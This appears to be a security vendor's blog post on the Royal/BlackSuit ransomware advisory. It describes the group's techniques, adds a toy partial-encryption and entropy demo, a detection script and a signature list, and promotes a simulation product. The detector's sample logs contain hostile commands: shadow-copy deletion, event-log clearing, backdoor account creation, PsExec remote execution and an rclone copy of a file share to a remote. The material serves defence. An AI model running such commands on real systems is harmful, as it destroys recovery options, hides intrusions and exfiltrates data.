CISA Alert AA23-061A: BlackSuit (Royal) Ransomware Analysis, Simulation, and TTPs


Updated on August 9th, 2024: Royal ransomware has rebranded as BlackSuit ransomware and adopted new TTPs. This blog was updated in August 2024 to reflect these changes.

On March 2nd, 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI released a joint advisory on Royal ransomware, which targets healthcare, communications, manufacturing, and education organizations in the United States [1]. Royal ransomware threat actors use a wide variety of initial access, defense evasion, and encryption techniques to increase their number of victims and maximize impact. In August 2024, CISA updated the advisory to reflect that the group had rebranded itself as BlackSuit ransomware and added new tactics, techniques, and procedures (TTPs) to its arsenal.

The Picus Threat Library already included attack simulations for Royal ransomware. In this blog, we explain the TTPs used by the Royal (BlackSuit) ransomware group and how you can assess your security posture against its attacks.


Royal Ransomware Rebranded as BlackSuit Ransomware

Royal ransomware (aka BlackSuit, DEV-0569) was first observed in September 2022. The group does not operate under the Ransomware-as-a-Service business model and does not restrict itself to specific sectors or countries, although critical infrastructure organizations in the United States and Brazil stand out among its victims. Royal ransomware is estimated to have impacted more than 70 organizations worldwide.

Figure 1: Distribution of Royal Ransomware Attacks by Countries [2]

Royal ransomware threat actors use the double extortion method: they steal their victims' data before encrypting it. The exfiltrated data serves both as proof of compromise and as leverage, since the threat of publishing sensitive data pressures victims into paying the demanded ransom. After encrypting the data, Royal ransomware appends a new extension to the encrypted files (".royal", with ".royal_u" and ".royal_w" observed in the Linux/ESXi and Windows variants, respectively) and leaves a ransom note. Ransom demands range between $1 million and $11 million in Bitcoin.

Royal ransomware developers, who were formerly part of the Conti ransomware operation, quickly incorporate new techniques into their attacks. As a result, different campaigns show different initial access and defense evasion techniques.

The group has since rebranded itself as BlackSuit ransomware, a change reflected in CISA's August 2024 update of the advisory, and has added new adversary techniques to its toolset. The BlackSuit payload appends the ".blacksuit" file extension to encrypted files and leaves a ransom note named "README.BlackSuit.txt".

TTPs Used by Royal (BlackSuit) Ransomware

Tactic: Initial Access & Persistence

T1133 External Remote Services

Royal ransomware threat actors gain initial access by convincing victims, through social engineering, to install legitimate remote monitoring and management (RMM) software. Because the RMM agent is a legitimate, signed application that survives reboots, it also gives the adversaries persistence in the victims' systems.

T1190 Exploit Public-Facing Application

Adversaries exploit vulnerable, internet-facing VMware ESXi servers to gain initial access. Many other ransomware families abuse the same class of vulnerabilities, so organizations are advised to patch their exposed ESXi servers promptly.

T1566 Phishing

Royal ransomware attackers use phishing emails carrying malicious PDF attachments and malvertising links. The phishing emails lure victims into installing RMM software, which the attackers then use for access.

Tactic: Execution

T1059 Command and Scripting Interpreter

Royal ransomware uses batch scripts to execute commands on infected systems. These scripts help the adversaries to:

  • add new users to the infected system (T1078 Valid Accounts)
  • force a Group Policy update (T1484 Domain Policy Modification)
  • run reconnaissance and collect information about the victim (T1119 Automated Collection)
  • download additional malware to establish persistence (T1105 Ingress Tool Transfer)
  • delete malicious artifacts to hinder further analysis (T1070 Indicator Removal)

Tactic: Defense Evasion

T1562 Impair Defenses & T1484 Domain Policy Modification

Royal ransomware threat actors disable antivirus software before exfiltration and encryption, in some cases by pushing the change through Group Policy, so that the payload runs without being detected or blocked.

Tactic: Lateral Movement

T1021 Remote Services

Adversaries use PsExec, a Microsoft Sysinternals tool, to move laterally in the victim's network. In some cases, threat actors compromised the domain controller using valid accounts.

Tactic: Command and Control (C2)

T1105 Ingress Tool Transfer

Royal ransomware threat actors transfer additional malware and RMM software such as AnyDesk, Atera, and LogMeIn from their C2 servers after they gain access to the victims' systems.

T1572 Protocol Tunneling

Adversaries use Chisel, an open-source tunneling tool, to communicate with their C2 servers. Chisel transports the tunnel over HTTP and secures it with SSH, which lets the C2 traffic blend in with ordinary web traffic.

Tactic: Exfiltration

T1041 Exfiltration over C2 Channel

Royal ransomware actors use Cobalt Strike, MegaCMD, rclone, SharpExfil, and Ursnif/Gozi to exfiltrate data to their C2 servers.

Tactic: Impact

T1486 Data Encrypted for Impact

Royal ransomware uses a custom encryption scheme that encrypts large files only partially, both to speed up encryption and to evade detection heuristics that look for fully encrypted files. How much of a file is encrypted depends on its size and on the "ep" (encryption percentage) parameter passed when the ransomware payload is executed:

  • If the file size is smaller than 5245 MB, or "ep" is set to 100, the entire file is encrypted.
  • If the file size is larger than 5245 MB and "ep" is set to a value other than 100, that percentage of the file is encrypted.
  • If the file size is larger than 5245 MB and no "ep" parameter is given, 50% of the file is encrypted.

The ransomware uses the Windows Restart Manager to determine whether a targeted file is in use or locked by another application, so that such files can still be encrypted.
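The following is an added example, not code from Picus or from the ransomware, that implements the three size/"ep" rules above and then shows why partial encryption matters for detection: a whole-file entropy check sees a mixed file, while a windowed check still finds fully random regions. The 5245 MB threshold is the page's figure; the encryptor is a toy XOR keystream standing in for the real cipher, the assumption that the encrypted region is a contiguous prefix is ours (the page does not describe the layout), and the sample "document" is constructed.

```python
import math
import random
from collections import Counter
from typing import Optional

# Size threshold from the page (5245 MB). The page's rules are modelled here;
# nothing below is Royal's actual implementation.
THRESHOLD_BYTES = 5245 * 1024 * 1024


def bytes_to_encrypt(file_size: int, ep: Optional[int], threshold: int = THRESHOLD_BYTES) -> int:
    """Apply the page's three rules: small files and ep=100 -> whole file;
    otherwise large files -> ep percent, defaulting to 50 when -ep is absent."""
    if ep is not None and not 0 <= ep <= 100:
        raise ValueError("ep must be a percentage between 0 and 100")
    if file_size < threshold or ep == 100:
        return file_size
    pct = 50 if ep is None else ep
    return file_size * pct // 100


def partially_encrypt(data: bytes, ep: Optional[int], threshold: int = THRESHOLD_BYTES,
                      seed: int = 1) -> bytes:
    """Stand-in encryptor: XOR the first N bytes with a seeded pseudorandom keystream.
    ASSUMPTION: the encrypted region is a contiguous prefix (the page does not say how
    Royal lays the encrypted portion out). The keystream is a toy, not the real cipher."""
    n = bytes_to_encrypt(len(data), ep, threshold)
    keystream = random.Random(seed).randbytes(n)
    return bytes(a ^ b for a, b in zip(data[:n], keystream)) + data[n:]


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 8.0 is perfectly uniform, English text is roughly 4 to 5."""
    if not buf:
        return 0.0
    total = len(buf)
    return -sum(c / total * math.log2(c / total) for c in Counter(buf).values())


def windowed_entropy(buf: bytes, window: int = 4096) -> list:
    """Entropy of each fixed-size window; this is what a detector should look at."""
    return [shannon_entropy(buf[i:i + window]) for i in range(0, len(buf), window)]


def demo() -> dict:
    # Constructed sample document: repetitive, low-entropy text.
    plain = b"Quarterly report: revenue by region.\n" * 3000
    # threshold=0 forces the large-file rule so a small buffer exhibits partial encryption.
    enc = partially_encrypt(plain, ep=50, threshold=0)
    windows = windowed_entropy(enc)
    return {
        "encrypted_bytes": bytes_to_encrypt(len(plain), 50, threshold=0),
        "whole_file_entropy": shannon_entropy(enc),   # mixed: below the random ceiling
        "max_window_entropy": max(windows),           # the encrypted half: close to 8
        "min_window_entropy": min(windows),           # the untouched half: text-like
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value:.3f}" if isinstance(value, float) else f"{key}: {value}")
```

The practical point is the gap between the whole-file figure and the per-window maximum: a detector that computes one entropy value per file will under-estimate a partially encrypted file, whereas a windowed check flags the encrypted region regardless of what fraction "ep" selected.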

T1490 Inhibit System Recovery

Royal ransomware uses vssadmin, the command-line tool for the Windows Volume Shadow Copy Service, to delete volume shadow copies. This prevents victims from using built-in recovery to restore the encrypted files. Separately, the actors delete system logs after exfiltration to hinder investigation (T1070 Indicator Removal).
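Several of the TTPs above leave command-line evidence that can be matched in process-creation telemetry: the batch-script actions under Execution (account creation, forced Group Policy refresh, artifact deletion), PsExec lateral movement, rclone exfiltration, and the shadow-copy deletion just described. The following added example, not Picus or CISA material, runs simple rules over constructed Sysmon Event ID 1 / Security 4688 style records. The log records are made up for this example, and wevtutil is our assumption for the log-clearing step (the page only states that logs were deleted).

```python
import re
from collections import defaultdict

# Constructed process-creation records modelled on Sysmon Event ID 1 / Security 4688
# fields. Sample data written for this example, not logs from a real incident.
SAMPLE_EVENTS = [
    {"host": "WS-042", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c net user svc_backup P@ssw0rd! /add && net localgroup administrators svc_backup /add"},
    {"host": "WS-042", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\gpupdate.exe",
     "cmdline": "gpupdate /force"},
    {"host": "DC01", "user": "CORP\\jdoe", "image": r"C:\Tools\PsExec.exe",
     "cmdline": r"PsExec.exe \\FS01 -s -d cmd.exe /c C:\Windows\Temp\run.bat"},
    {"host": "FS01", "user": "NT AUTHORITY\\SYSTEM", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "FS01", "user": "NT AUTHORITY\\SYSTEM", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil.exe cl Security"},
    {"host": "WS-042", "user": "CORP\\jdoe", "image": r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe",
     "cmdline": r"rclone.exe copy \\FS01\finance remote:dump --transfers 16"},
    # Benign noise that the rules must not flag: a listing, and an account query.
    {"host": "WS-007", "user": "CORP\\asmith", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},
    {"host": "WS-007", "user": "CORP\\asmith", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user asmith"},
]

# (ATT&CK ID as given on the page, description, regex over the command line)
RULES = [
    ("T1078", "local account creation (net user ... /add)",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\b.*?\s/add\b", re.I)),
    ("T1484", "forced Group Policy refresh (gpupdate /force)",
     re.compile(r"\bgpupdate(?:\.exe)?\b.*\s/force\b", re.I)),
    ("T1021", "remote execution with PsExec against a UNC target",
     re.compile(r"\bpsexec(?:64)?(?:\.exe)?\s+\\\\\S+", re.I)),
    ("T1490", "shadow copy deletion (vssadmin delete shadows)",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    # ASSUMPTION: wevtutil as the log-clearing tool; the page does not name one.
    ("T1070", "event log clearing (wevtutil cl)",
     re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b", re.I)),
    ("T1041", "bulk copy to a remote with rclone",
     re.compile(r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b", re.I)),
]


def detect(events):
    """Return one finding per (event, matching rule)."""
    findings = []
    for ev in events:
        for tid, desc, rx in RULES:
            if rx.search(ev["cmdline"]):
                findings.append({"host": ev["host"], "user": ev["user"],
                                 "technique": tid, "description": desc,
                                 "cmdline": ev["cmdline"]})
    return findings


def techniques_by_host(findings):
    """Group techniques per host so a chain (e.g. T1070 + T1490 on one server) stands out."""
    grouped = defaultdict(set)
    for f in findings:
        grouped[f["host"]].add(f["technique"])
    return {host: sorted(t) for host, t in grouped.items()}


def recovery_inhibited_hosts(findings):
    """Hosts where shadow copies were deleted: encryption is imminent or already done,
    so these are the machines to isolate first."""
    return sorted({f["host"] for f in findings if f["technique"] == "T1490"})


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f['host']:7} {f['technique']} {f['description']}: {f['cmdline']}")
    print("isolate first:", recovery_inhibited_hosts(hits))
```

The benign records (a `vssadmin list shadows` and a plain `net user` query) are there deliberately: rules keyed on the binary name alone would fire on routine administration, so each pattern anchors on the destructive or lateral verb as well.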

How Does Picus Help Simulate Royal Ransomware Attacks?

We strongly suggest simulating Royal ransomware attacks with the Picus Security Validation Platform to test the effectiveness of your security controls against ransomware. You can also test your defenses against hundreds of other ransomware families, such as Conti, Zeon, and ESXiArgs, within minutes with a 14-day free trial of the Picus Platform.

The Picus Threat Library includes the following threats for Royal (BlackSuit) ransomware:

Threat ID | Threat Name                          | Attack Module
----------|--------------------------------------|------------------------------
48663     | BlackSuit Ransomware Download Threat | Network Infiltration
52488     | BlackSuit Ransomware Email Threat    | Email Infiltration (Phishing)
52587     | Royal Ransomware Download Threat     | Network Infiltration
75964     | Royal Ransomware Email Threat        | Email Infiltration (Phishing)

Picus also provides actionable mitigation content. The Picus Mitigation Library includes prevention signatures for Royal ransomware and other ransomware families that can be applied in preventive security controls. Picus Labs has validated the following signatures for Royal (BlackSuit) ransomware:

Security Control | Signature ID | Signature Name
-----------------|--------------|------------------------------------------------------------
Check Point NGFW | 085844F96    | Ransomware.Win32.RoyalRansomware.TC.4b83aQXS
Check Point NGFW | 09C853DDC    | Ransomware.Win32.RoyalRansomware.TC.c016OpKr
Check Point NGFW | 0DA7A7D97    | Ransomware.Win32.RoyalRansomware.TC.2cf7nNBW
Check Point NGFW | 0D0175783    | Ransomware.Win32.BlackSuit.TC.1370evqV
Check Point NGFW | 0E29EF233    | Trojan.Win32.Imphash.TC.2130lAiv
Check Point NGFW | 0DF473BB5    | Trojan.Win32.Lazy.TC.ebb7ltHu
Check Point NGFW | 0AF4D77B1    | Trojan.Win32.Lazy.TC.30f0ZIlL
Cisco FirePower  | -            | W32.06ABC46D5D.in12.Talos
Cisco FirePower  | -            | Auto.B57E5F.261541.in02
Cisco FirePower  | -            | W32.Auto:90ae0c.in03.Talos
Cisco FirePower  | -            | W32.1C849ADCCC.in12.Talos
Cisco FirePower  | -            | BlackSuit:Evo.27gf.in14.Talos
Cisco FirePower  | -            | W32.DEDE96FD44-100.SBX.TG
Cisco FirePower  | -            | Auto.F1684F.271963.in02
Cisco FirePower  | -            | W32.79AB73A0E9-100.SBX.TG
Forcepoint NGFW  | -            | File_Malware-Blocked
Fortigate AV     | 58991        | W32/PossibleThreat
Fortigate AV     | 10107652     | W64/Royal.CF4E!tr.ransom
Fortigate AV     | 10122861     | Linux/Filecoder_Royal.A!tr
Fortigate AV     | 10136977     | W32/Filecoder.ONZ!tr.ransom
Fortigate AV     | 10135929     | Linux/Filecoder_Royal_AGen.A!tr
Fortigate AV     | 10179982     | W32/Filecoder_BlackSuit.C!tr.ransom
Trellix          | 0x4840c900   | MALWARE: Malicious File Detected by GTI
Palo Alto NGFW   | 539622002    | trojan/Win32.lazy.akp
Palo Alto NGFW   | 570890453    | ransomware/Linux.royal.d
Palo Alto NGFW   | 582983964    | Virus/Linux.outbreak.bon
Palo Alto NGFW   | 582991326    | ransomware/Win32.rents.l
Palo Alto NGFW   | 652741308    | Ransom/Win32.blacksuit.l
Palo Alto NGFW   | 652741311    | Ransom/Win32.blacksuit.o
Palo Alto NGFW   | 650938521    | Ransom/Win32.blacksuit.k
Palo Alto NGFW   | 652821864    | Ransom/Win32.blacksuit.n
Snort            | 1.61587.1    | MALWARE-OTHER Win.Ransomware.Royal variant download attempt

("-" means the vendor does not expose a separate signature ID for that detection.)

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] "#StopRansomware: Royal Ransomware," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a. [Accessed: Mar. 04, 2023]

[2] "Conti Team One Splinter Group Resurfaces as Royal Ransomware with Callback Phishing Attacks," Trend Micro, Dec. 21, 2022. [Online]. Available: https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html. [Accessed: Mar. 04, 2023]